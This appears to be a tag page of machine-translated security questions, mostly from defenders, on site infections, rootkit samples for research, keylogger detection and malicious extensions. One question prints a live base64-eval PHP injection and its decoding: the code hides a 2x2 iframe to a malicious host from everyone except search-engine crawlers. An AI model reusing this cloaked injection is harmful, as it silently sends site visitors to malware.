标签: malware-detection

是否可以在Android平台上反编译APK或DEX文件？有没有可以反编译APK文件的工具？

我的网站(非常大的社区网站)最近感染了病毒.每个index.php文件都被更改,以便将这些文件的开头php标记更改为以下行:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0='));

当我解码它时,它产生了以下PHP代码:

    <?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    array("64.68.80.0"  ,"64.68.87.255"  ),
    array("66.102.0.0",  "66.102.15.255"),
    array("64.233.160.0","64.233.191.255"),
    array("66.249.64.0", "66.249.95.255"),
    array("72.14.192.0", "72.14.255.255"),
    array("209.85.128.0","209.85.255.255"),
    array("198.108.100.192","198.108.100.207"),
    array("173.194.0.0","173.194.255.255"),
    array("216.33.229.144","216.33.229.151"),
    array("216.33.229.160","216.33.229.167"),
    array("209.185.108.128","209.185.108.255"),
    array("216.109.75.80","216.109.75.95"),
    array("64.68.88.0","64.68.95.255"),
    array("64.68.64.64","64.68.64.127"),
    array("64.41.221.192","64.41.221.207"),
    array("74.125.0.0","74.125.255.255"),
    array("65.52.0.0","65.55.255.255"),
    array("74.6.0.0","74.6.255.255"),
    array("67.195.0.0","67.195.255.255"),
    array("72.30.0.0","72.30.255.255"),
    array("38.0.0.0","38.255.255.255")
    );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){ …

Visual Studio Code 中的扩展有多安全？

扩展会引入恶意软件吗？

安装任何扩展是否安全？

我正在研究Linux内核Rootkit检测的一些新技术作为我的论文.我需要一些rootkit样本来测试我的方法,还做一些机器学习测试.但是,在计算机历史书籍中也可以找到包装风暴中的旧尘埃.我已经阅读了很多关于它的内容,我在phrack和其他一些资源中看到了一些rootkit实现的新方法.我需要花费大量时间才能为他们实现PoC rootkit,到那时我才能到达项目的起点.

如果有人能帮助我,我将不胜感激.任何站点,ftp,受损系统,未知的rootkit库,任何可能是我的工作样本的东西都表示赞赏.但考虑到这一点,我需要的是Linux内核Rootkit.任何类型,LKM,系统调用挂钩,对象挂钩,system.map/dev/mem工作的东西

谢谢

ps by new rootkits我不是说非报告或全新的rootkit,可以在ubuntu 10.04或更新版本上工作的东西会很棒(内核版本2.6.32+)

我们提供可从我们的网站下载为InstallShield EXE的Windows程序.

当运行IE9的人试图下载并运行我们的软件时,他们会在屏幕底部看到以下消息:

PROGRAMNAME.exe is not commonly downloaded and could harm your computer.
[DELETE] [ACTIONS] [VIEW DOWNLOADS]

我读过http://blogs.msdn.com/b/ie/archive/2011/03/22/smartscreen-174-application-reputation-building-reputation.aspx

它表明:

• 使用Authenticode签名对您的程序进行数字签名.
• 确保下载不会被检测为恶意软件.
• 申请Windows徽标.

我们做了所有这三件事.我们的EXE使用authenticode签名进行数字签名(警告消息上方的栏是橙色,而不是红色,表示IE9识别并验证了签名).我们尝试过的任何防病毒程序都未将我们的下载检测为恶意软件.我们申请并收到了Windows徽标.

到目前为止,我们的大多数客户都没有使用IE 9.但这对那些做的人来说非常麻烦.我们还有什么办法可以解决这个问题,还是我们只需要等到一大批客户下载这个软件才能消除此消息？

(这是否意味着当我们发布新版本时,所有IE 9用户将再次收到此消息,直到有足够的人下载它？)

更新2011-06-14:

谢谢,@ EricLaw-MSFT.URL是http://dakim.dakiminc.netdna-cdn.com/DakimBrainFitness.exe.(它可以在http://www.dakim.com上的"下载免费试用版"按钮中找到.)

我们只提供了一段时间的可下载试用版.我们的主要分发方法是安装DVD.

Chrome在我访问我的网站时说,搜索后我从网站上清理了我的代码,但Chrome仍然显示然后我从我的网站上删除了所有文件,只是上传了index.html(空白文件),但仍然显示警告.

我可能会编写一个程序来检测作为密钥记录的恶意(或非恶意)软件(记录关键笔划以获取信息).

1. 会用什么策略？
   • 是否有某些代码需要查找？
   • 我应该搜索某些地点吗？
2. 我更喜欢Java或Perl,因为我精通这些语言
   • 这些语言会起作用吗？
   • 是否有更好的语言用于此案例？
3. 会用什么？
   • 码？
   • 算法？
   • 功能？

我想要恶意软件感染网站列表(只有URL)的任何指针？

找到一些,但他们没有下载列表的选项.

一些网站是:http: //malc0de.com/database/

http://www.malwareblacklist.com/showMDL.php

无法从这些列表中复制每个URL.

任何指向这些的指标都表示赞赏.

几天前我注意到我的服务器上的几乎所有php文件都被一些加密代码感染,几乎每个文件都不同.以下是其中一个文件的示例:

http://pastebin.com/JtkNya5m

任何人都可以告诉我这个代码做了什么或如何解码它？

越来越多的用户（我管理一个法国博客平台）抱怨我们界面上的错误。在 90% 的情况下，问题来自于用户浏览器上安装的扩展程序。用户通常甚至不知道他们有这些扩展。

例如，Avast 删除了共享按钮（Twitter、FB），而一些扩展如 Pricepeep、Slick Saving、Deaply Shopping、VideoFileDownload 或 Pricora 则完全搞乱了我们的界面。

问题是用户认为这是我们的错，然后在没有进一步调查的情况下退出:-(

您是否有神奇的解决方案来阻止或检测部分或全部不良浏览器扩展？提前致谢！